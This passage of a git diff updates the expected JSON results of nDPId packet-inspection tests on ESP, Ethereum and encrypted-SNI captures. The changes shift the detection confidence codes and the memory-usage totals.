00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879675 bytes -~~ total memory freed........: 5879675 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6013309 bytes +~~ total memory freed........: 6013309 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1431 chars diff --git a/test/results/esp.pcapng.out b/test/results/esp.pcapng.out index a910685a6..a385fce4d 100644 --- a/test/results/esp.pcapng.out +++ b/test/results/esp.pcapng.out 
@@ -2,15 +2,15 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587340723655} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587340723655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587340723655,"pkt":"qrvMAAMQqrvMAAIQCABFwAGCAN8AAP8RncEKAgMCCgMEBAH0AfQBbm9jBawPTRIgE\/QAAAAAAAAAACEgIggAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAADDsDka\/duvsZYQytelWlC6NzARHfxQ9jT\/JU2Un7NCQA+jXJ08WlF7e\/NDuPTB526R8Cb4Zuk\/QhNNiyysAyBZ0W7cfOpAFmMETkjg2lvpSaO0W743zdwZbhwL5xtEDwKwAAJBinv2eNdHZsJ29wVvPTnOU5tMnnhBtj26lK3VUpGlaPKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABE++qlf\/rnDMCHdomXQhhbbCu7VdAAAAHAAAQAWxbxU4srTSjW8apuj3nZ6SyjPUCQ=="} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587340723662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587340723662,"pkt":"qrvMAAIQqrvMAAMQCABFwAGCALsAAP4RnuUKAwQECgIDAgH0AfQBbq1OBawPTRIgE\/RfRu5wvExdDSEgIiAAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAAeXKfqwaHkiVcMu+s4hPX5cnikVUBSUWhEvjp8uoOs40Tz5cGWTSvQJV6y1mRBbxFiQyb2IMgnjb1iZi0xKtA\/z0+EIGKekMJYxfmbb\/4xwAcTsSdkiXWBGpDjFPvtwoFKwAAJFV3ojUiOZ96AboWM1NGpIwiUnFn+cWbLdwgiG0miL+8KwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABM9z9pZZgKD+9ZzdamlEsYrKkUeFAAAAHAAAQAW1v1HiklqGfJbwATvaTOUm2F82pg=="} 
00903{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587340723670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1587340723670,"pkt":"qrvMAAMQqrvMAAIQCABFwAF0AOAAAP8Rnc4KAgMCCgMEBAH0AfQBYJxOBawPTRIgE\/RfRu5wvExdDS4gIwgAAAABAAABWCsAATwo9kmU8gXj0EedKmJNK+VWGrNk6m7d+9Hkki0QPpJ2UQ5K8xYpTzRz1oZI364ZkaSAYAohIEiUwnprO5bmbmb9qIM0+fTiZw1DojFlouyNg03a\/0kz6o8jRJv4PqCaYhITIh\/4NKPCOB9tcYohRiSgu\/5zHv5JvWQ3XksC8IcgVNMiE\/5aFElRFljlmMpjAGXZkK5XnvWJkamx2rhcvcJAij70Uj\/oD\/j\/w0o\/c6VbgHLqoRwpcPmMvxRAwmOQ9oz2xcYWrhIQBi3xWUKWjmz+pxNn90bdNL3SDkdsODmIIBQap7G54zol1jJWQerYPntwLshRMgA0rGIBYYU+04lQqf81IAAxPlDlMj5Hwsr6MJ2wlEyY2dKouxpx9+iHwUGg8fELtW5lR77T\/2mt7GtUUmU2DqAv\/QQ="} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3} 
00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587340725658,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587340725658,"pkt":"qrvMAAMQqrvMAAIQCABFAACYACQAAP8yoAUKAgMCCgMEBCNgsOMAAAABectfgWUl04YUbzWcC+4xd1UOV3SUluMVSc1O+uGKzjlWG3KV9r0S61l07FAMCtvDlpgFzU5YdVATZgur7sMbrkC7o3l\/upPdN3M20ENHGJg7SyVgEI8QrdTAVpl1VXAu7t+SCLVFZwaCQYUWnFFZvKSDZFqF6SACpTMBZA=="} -00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587340725659,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587340725659,"pkt":"qrvMAAIQqrvMAAMQCABFAACYACQAAP4yoQUKAwQECgIDAvAJLLUAAAABLX+WjVQswRpYbFeiaZdQW6eWJsw6BS2eB7OP9\/5eHwi2mYpUZ6G3t755XGwuYLanMk25K6hMBwBSxcZ\/ydNZPrrxBrySAlcBAFV4v6tDTuHpnnv89BSOnoK6gF0SG3nSCAMIxyxKQV4U+ecInNO5d\/EnrgCW7OWI7NuXZg=="} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587340723655,"flow_last_seen":1587340723676,"flow_idle_time":200000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1356,"flow_avg_l4_payload_len":339,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587340725658,"flow_last_seen":1587340725659,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587340723655,"flow_last_seen":1587340723676,"flow_idle_time":200000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1356,"flow_avg_l4_payload_len":339,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587340725658,"flow_last_seen":1587340725659,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1620,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1587340725659} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 
@@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870677 bytes -~~ total memory freed........: 5870677 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6004311 bytes +~~ total memory freed........: 6004311 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 923 chars diff --git a/test/results/ethereum.pcap.out b/test/results/ethereum.pcap.out index a80879c6a..dc69c56f3 100644 --- a/test/results/ethereum.pcap.out +++ b/test/results/ethereum.pcap.out 
@@ -2,29 +2,29 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1578508362274} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578508362274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508362274,"pkt":"KDc3AG3IEBMx8Tl2CABFAACc0mBAADURe2hXDt4ZwKgBuN11dl8AiEJtHMys6Q29AOp21rwpZSDXERjTbIzhwNph0idC5kCkV\/FDnhOUP\/GMZC9pQ1ikY4tKfgVohRJdDV\/jhdY3JkNQ8nfjTjeSnG7Ixlzbx1L2txMkADCUTD6WfRXFuzz03\/IfAAHdBMuEfwAAAYJ2X4J2X8mETxbOvYLp94CEXhYgXgU="} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578508363333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508363333,"pkt":"KDc3AG3IEBMx8Tl2CABFAADH0wVAADURephXDt4ZwKgBuN11dl8As\/l1jW6o\/uOLsNilE7wPPGgWLrGBgPfvOzwO1DfZyAOcgKFZ114jjOcqSahrn1BNVaBcqPiZ+5Zw3KmlNNeK6areM2YGHfDo3L4DI03KcwYwznBps1b+iFJS+0Kipikc3Gq9AQP4R7hAl090ZgbQhHWBj8BMRwa4LeNB32fKxPZW6UW3BwzH4FX8L40Uh5Yh\/LpdLpgFyY0tX7A7rx7OhPCc704eHlKGuoReFiBf"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1578508363692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1578508363692,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdOfxAACwR9O08vyBHwKgBuHZfdl8AicNGfxf10Wb92tmu8P4AYDHc1S9CYBd0hA8u+7bp2exSZpfjoD4stw3HK2zECpnkODZdOg6LxGWvabU8eolUhCpRWxf283jKbdR45yXwcXrtjWJbPi2JRR9Nts4CTYECrpr\/AQHeBcuErBIAAoJ2X4J2X8uETxbOvYLp94J2X4ReFiBe"} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1578508364272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1578508364272,"pkt":"KDc3AG3IEBMx8Tl2CABFCACn7eVAACURF08DcIo5wKgBuGOsdl8Ak1lonaJ3QYcb7U0uMgLRKCkYOOmsVBzd6scD1gTgbTNauX3kB3bPaDZ67w0\/6JScqj4YBzeDQtx9d9GUfbwpNwws+A3fj9N5t1f25M57T8Etpo9cRpw0Ipg9vE7GnadXMLBRAAHoBNeQAAAAAAAAAAAAAAAAAAAAAIInD4InD8mETxbOvYLp94CEXhYgYA=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHswoAAEAR05vAqAG4A9EtT3Zfdl8As46jAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} 